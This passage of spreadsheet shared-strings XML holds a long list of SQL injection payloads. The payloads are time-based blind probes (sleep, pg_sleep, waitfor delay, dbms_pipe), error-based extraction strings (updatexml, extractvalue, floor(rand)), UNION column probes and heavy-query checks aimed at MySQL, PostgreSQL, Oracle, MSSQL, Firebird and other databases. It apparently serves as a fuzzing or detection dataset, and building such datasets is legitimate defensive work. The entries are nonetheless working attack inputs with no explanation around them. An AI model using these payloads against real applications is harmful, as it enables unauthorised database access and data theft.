    <t xml:space="preserve">1, ( select  ( case when  ( 5141 = 5141 )  then  ( ascii ( regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )   )  else 5141/ ( select 0 from  ( values ( 0  )  )   )  end )  from  ( values ( 0  )  )   ) </t>
  </si>
  <si>
    <t>1  )  )   )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (   ( 5333 = 5333</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( 'hmsu' = 'hmsu</t>
  </si>
  <si>
    <t>1 )  where 5333 = 5333 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1 )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1' where 1692 = 1692</t>
  </si>
  <si>
    <t>1" )  union all select null--</t>
  </si>
  <si>
    <t>-5595"  )  )   as xttj where 4562 = 4562 union all select 4562,4562,4562,4562,4562#</t>
  </si>
  <si>
    <t xml:space="preserve">1 and sleep ( 5 ) </t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  'zizo' like 'zizo</t>
  </si>
  <si>
    <t>1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and 'vmuj' like 'vmuj</t>
  </si>
  <si>
    <t>1' )  as bxae where 4143 = 4143 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and  ( 4614 = 4614</t>
  </si>
  <si>
    <t>1"  )  )   )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) # tcrm</t>
  </si>
  <si>
    <t>-4513"  )  )   )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>-2149"  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( "hoon" like "hoon</t>
  </si>
  <si>
    <t>1 )  where 9724 = 9724 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( "uqyb" = "uqyb</t>
  </si>
  <si>
    <t>-4615'  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( 'jipk' like 'jipk</t>
  </si>
  <si>
    <t>1" or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and "xbft" = "xbft</t>
  </si>
  <si>
    <t>1  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (   ( 3023 = 3023</t>
  </si>
  <si>
    <t>1%" and make_set ( 2905 = 5725,5725 )  and "%" = "</t>
  </si>
  <si>
    <t>-9023%"  )  )   )  union all select 4490,4490,4490#</t>
  </si>
  <si>
    <t>-8790' )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122</t>
  </si>
  <si>
    <t>1 where 8532 = 8532</t>
  </si>
  <si>
    <t>1'  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  'lwyo' = 'lwyo</t>
  </si>
  <si>
    <t>1' )  where 6388 = 6388 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1' and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and 'dubu' like 'dubu</t>
  </si>
  <si>
    <t>-1593' or elt ( 7044 = 6125,6125 )  and 'zkuz' = 'zkuz</t>
  </si>
  <si>
    <t>-8876'  )  )   or 3038 = 3038</t>
  </si>
  <si>
    <t>1" )  as cfed where 8220 = 8220 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%'  )  )   )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'lgcw' = 'lgcw</t>
  </si>
  <si>
    <t>1"  )  )   as czzg where 5483 = 5483 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>1' )  where 7007 = 7007 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1" and 4996 = 4431 and "jzaq" = "jzaq</t>
  </si>
  <si>
    <t>1' )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 'iwkg' = 'iwkg</t>
  </si>
  <si>
    <t>1' where 6905 = 6905 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'tpcm' like 'tpcm</t>
  </si>
  <si>
    <t>1" )  where 6072 = 6072 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1" )  as lexx where 2892 = 2892 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-2838" where 5442 = 5442 union all select 5442#</t>
  </si>
  <si>
    <t>-5181"  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( "qofp" = "qofp</t>
  </si>
  <si>
    <t>1'|| ( select 'dyuw' from dual where 2037 = 2037</t>
  </si>
  <si>
    <t>1"  )  )   or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (  "aall" like "aall</t>
  </si>
  <si>
    <t>1' )  and  ( 3020 = 3020 ) *6703 and  ( 'lhfa' = 'lhfa</t>
  </si>
  <si>
    <t>-3230"  )  )   as kbxc where 5007 = 5007 or 2107 = 8818</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1' )  where 6408 = 6408</t>
  </si>
  <si>
    <t>1'+ ( select 'vedi' where 2774 = 2774 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1" and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' )  as irck where 3660 = 3660 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>-2782" union all select 2109,2109,2109#</t>
  </si>
  <si>
    <t>1' )  as xqbq where 1619 = 1619 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-2516 )  where 3349 = 3349 or 4855 = 1806--</t>
  </si>
  <si>
    <t>1" )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( "xsfg" like "xsfg</t>
  </si>
  <si>
    <t>1'  )  )   as wjfj where 3802 = 3802</t>
  </si>
  <si>
    <t>-6661'  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char (</t>
  </si>
  <si>
    <t>1" )  as kuuf where 6908 = 6908</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  </t>
  </si>
  <si>
    <t>1  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 1205 = 1205</t>
  </si>
  <si>
    <t>1'+ ( select 'tzyz' where 4912 = 4912 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1%" or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (  'bemh' = 'bemh</t>
  </si>
  <si>
    <t>-4173' )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>select  ( case when  ( 6652 = 1932 )  then 6652 else 6652* ( select 6652 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>-5763'  )  )   )  union all select 1640,1640,1640,1640,1640,1640,1640,1640,1640,1640#</t>
  </si>
  <si>
    <t>1' where 5458 = 5458 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t xml:space="preserve">-4239 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  </t>
  </si>
  <si>
    <t>1 )  as ekgx where 9923 = 9923 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'+ ( select 'ayod' where 7839 = 7839 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  +'</t>
  </si>
  <si>
    <t>1%"  )  )   )  rlike  ( select  ( case when  ( 4442 = 4476 )  then 1 else 0x28 end  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>select case when 3995 = 8680 then 1 else null end--</t>
  </si>
  <si>
    <t>1' )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 'zcey' = 'zcey</t>
  </si>
  <si>
    <t>1"  )  )   as iqgd where 7611 = 7611 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and 'sqvt' like 'sqvt</t>
  </si>
  <si>
    <t>1' )  as mzby where 6530 = 6530</t>
  </si>
  <si>
    <t>1"  )  )   )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( "bizm" = "bizm</t>
  </si>
  <si>
    <t>1"  )  )   or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'ilkr' from dual where 9296 = 9296</t>
  </si>
  <si>
    <t>1%' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1'|| ( select 'jonh' from dual where 2415 = 2415 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 1483 = 7301,1,1/0 ) </t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null--</t>
  </si>
  <si>
    <t>1 )  where 3062 = 3062 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>select  ( case when  ( 3773 = 3722 )  then 3773 else 3773* ( select 3773 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>-4954' )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>1 where 3737 = 3737 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1" )  as wjdc where 8694 = 8694 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>1 )  where 5464 = 5464 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as jikg where 8258 = 8258 and  ( 3973 = 1047 ) *1047--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 4108 = 4108 )  then 1 else 4108* ( select 4108 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t>1' where 3028 = 3028</t>
  </si>
  <si>
    <t>1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and 'egye' = 'egye</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select concat ( 0x7171706a71, ( select  ( elt ( 7381 = 7381,1  )  )   ) ,0x717a767a71  )  )  </t>
  </si>
  <si>
    <t>-3729'  )  )   or elt ( 4482 = 2648,2648 )  and   (  (  'vkkr' like 'vkkr</t>
  </si>
  <si>
    <t>1%' and make_set ( 1227 = 5627,5627 )  and '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   )  waitfor delay '0:0:5' and   (  (   ( 'zhhf' like 'zhhf</t>
  </si>
  <si>
    <t>1" )  where 5719 = 5719 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) ||'</t>
  </si>
  <si>
    <t>1'|| ( select 'zdfo' from dual where 4288 = 4288 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-3368'  )  )   union all select 4913,4913,4913,4913,4913,4913,4913,4913,4913--</t>
  </si>
  <si>
    <t xml:space="preserve"> end and "unqj" = "unqj</t>
  </si>
  <si>
    <t>1"  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( "krxy" = "krxy</t>
  </si>
  <si>
    <t>1" )  where 4382 = 4382 and 6607 = 2394--</t>
  </si>
  <si>
    <t>select pg_sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t>1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and 'kjfm' = 'kjfm</t>
  </si>
  <si>
    <t xml:space="preserve">-6928"  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 </t>
  </si>
  <si>
    <t>1'  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  'zknl' = 'zknl</t>
  </si>
  <si>
    <t>-7851"  )  )   or 6872 = 6872 and   (  (  "dvbw" like "dvbw</t>
  </si>
  <si>
    <t>1%'  )  )   and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) </t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null#</t>
  </si>
  <si>
    <t>1'  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( 'dbsm' = 'dbsm</t>
  </si>
  <si>
    <t>1%" or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1 where 5266 = 5266 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>1' )  as jxtg where 1071 = 1071 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null--</t>
  </si>
  <si>
    <t>1"  )  )   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "giuq" = "giuq</t>
  </si>
  <si>
    <t>1" where 6281 = 6281 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" )  as nixg where 4580 = 4580 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1" )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( "udlh" = "udlh</t>
  </si>
  <si>
    <t>1%" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>1%' and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> end-- podi</t>
  </si>
  <si>
    <t>-9398' union all select 3998,3998,3998,3998,3998,3998,3998,3998,3998#</t>
  </si>
  <si>
    <t>1%'  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-8538%' or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and '%' = '</t>
  </si>
  <si>
    <t>-2364' or 6743 = 7578</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null#</t>
  </si>
  <si>
    <t>1 )  as qyic where 9736 = 9736 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  </t>
  </si>
  <si>
    <t>1" )  as tqxa where 6751 = 6751 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>select * from generate_series ( 4975,4975,case when  ( 4975 = 9615 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  </t>
  </si>
  <si>
    <t>1' and elt ( 4249 = 4249,7259 )  and 'awjd' = 'awjd</t>
  </si>
  <si>
    <t>1'  )  )   )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'vtno' = 'vtno</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">1  )  )  </t>
  </si>
  <si>
    <t>1' where 8584 = 8584 order by 1#</t>
  </si>
  <si>
    <t>-5963" or 9323 = 9323#</t>
  </si>
  <si>
    <t>1" )  where 8095 = 8095 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 1570 = 1570 )  then  ( select 1570 from pg_sleep ( 5  )  )   else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t>1 where 7021 = 7021 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1" )  as kfvy where 7305 = 7305 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1 where 8908 = 8908 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1' where 5547 = 5547</t>
  </si>
  <si>
    <t>1' )  where 5071 = 5071 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%" and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>1 where 6518 = 6518</t>
  </si>
  <si>
    <t>1' and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and 'lywy' like 'lywy</t>
  </si>
  <si>
    <t>1 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  # lexm</t>
  </si>
  <si>
    <t>-1258"  )  )   union all select 7734,7734,7734#</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select 6825 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6825 = 6825,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) </t>
  </si>
  <si>
    <t>1" or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and "cdai" = "cdai</t>
  </si>
  <si>
    <t>1'|| ( select 'qjwf' from dual where 3187 = 3187 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>-6996%" or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1%" and 7533 = 7533 and "%" = "</t>
  </si>
  <si>
    <t>1' where 8945 = 8945 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>1" )  where 4520 = 4520</t>
  </si>
  <si>
    <t>1%'  )  )   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">-8513 )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr </t>
  </si>
  <si>
    <t>1'|| ( select 'lnhq' where 7526 = 7526</t>
  </si>
  <si>
    <t>1 )  or sleep ( 5 )  and  ( 2211 = 2211</t>
  </si>
  <si>
    <t>-8893 )  union all select 7594,7594,7594,7594,7594,7594#</t>
  </si>
  <si>
    <t>-3747" )  union all select 8962,8962,8962,8962,8962#</t>
  </si>
  <si>
    <t>-7636' )  or 5898 = 8880 and  ( 'sjuv' = 'sjuv</t>
  </si>
  <si>
    <t>-4528" )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( "fxmt" like "fxmt</t>
  </si>
  <si>
    <t>1 )  where 5629 = 5629</t>
  </si>
  <si>
    <t xml:space="preserve">make_set ( 5679 = 9769,9769 ) </t>
  </si>
  <si>
    <t>1' and 5835 = 6157 and 'bjee' like 'bjee</t>
  </si>
  <si>
    <t xml:space="preserve">1%'  )  )  </t>
  </si>
  <si>
    <t>-8725"  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( "vblw" like "vblw</t>
  </si>
  <si>
    <t>1' in boolean mode )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 9337 = 9337 )  then waitfor delay '0:0:5' else 9337* ( select 9337 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1%' )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
